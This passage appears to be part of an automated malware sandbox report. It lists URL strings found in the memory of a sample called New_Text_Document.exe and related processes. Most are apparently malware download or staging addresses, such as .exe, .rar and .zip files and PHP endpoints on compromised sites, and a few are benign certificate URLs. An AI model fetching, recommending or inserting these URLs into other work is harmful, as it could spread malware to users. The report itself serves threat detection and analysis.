                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ji.jaoaaoas11.com/m/ss41.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jobcity.com/img/RM0XpX/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jointings.org/eng/wp-content/plugins/featurific-for-wordpress/3
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://josymixmyhome.com.br/site/direct.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jp.imgjeoighw.com/sts/image.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jrcpalladio.com/mi/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://karimgouss.ug/zxcvb.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kevinley.com/lib/bbKR/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://khanz.co.nz/imne/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kimyen.net/upload/VLTKBacdau.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kimyen.net/upload/VLTKNhatRac.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kimyen.net/upload/VLTKTanthuTN.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lara.amiyon.com/svcrun.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lastimaners.ug/asdfg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lastimaners.ug/zxcv.EXE
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lastimaners.ug/zxcvb.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://latierraprometida.co/tm/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://leticiamc.com.br/etut/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lindnerelektroanlagen.de/INVOICE/AOG-3515110/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://live.com.gt/codice/Cliente.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://live.com.gt/unito/Azienda.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://livetrack.in/EmployeeMasterImages/qace.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://madicon.co.za/b4f5or.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/diaphragm.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/labyrinth.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/mice.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/mist.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/nor.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/pewter.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/purveyance.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/review.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/sadden.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/socials.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://makeupuccino.com/specimen.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://marquesvogt.com/back/main_hXKtlXjN118.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://matsandmore.net/augs/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxman.shop/vtap/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxximbrasil.com/themes/file.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbgrm.com/wp-content/zza/south.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://meeweb.com/admin/swfupload/css/inf.inf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://migranoticias.com/ei/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mirometal.com/oi/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mistitis.ug/zxcvb.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mumgee.co.za/nynazczoa.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://namthaibinh.net/images/vin1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nassifenterprise.com/qa/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nerve.untergrund.net/releases/12.2013/nrv-ppwr.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nerve.untergrund.net/releases/zorke_release/zorke_asciiverter_v1.00/zke-ascv.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nerve.untergrund.net/releases/zorke_release/zorke_nfo_file_viewer_v1.00/zke-nfoview.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nguyendinhchieudng.edu.vn/eece/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nhatheptienchebinhduong.com/archivio/Informazioni.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://northgatebakery.ca/eco/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://npskudlu.com/cllip.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nrc-soluciones.com.ar/cgi-bin/n9b0A9N3JRrK6My/
                    Source: autolog.exe, 0000000D.00000002.1319146568.0000000000409000.00000004.00000001.01000000.0000000E.sdmp, autolog.exe, 0000000D.00000000.1272395182.0000000000409000.00000008.00000001.01000000.0000000E.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
                    Source: autolog.exe, 0000000D.00000002.1319146568.0000000000409000.00000004.00000001.01000000.0000000E.sdmp, autolog.exe, 0000000D.00000000.1272395182.0000000000409000.00000008.00000001.01000000.0000000E.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oazahotel.com.mk/more.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oceanicservices.in/tcr/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oceaniteservices.in/pcs/
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2272829573.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2502572191.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oilmex.mx/usit/
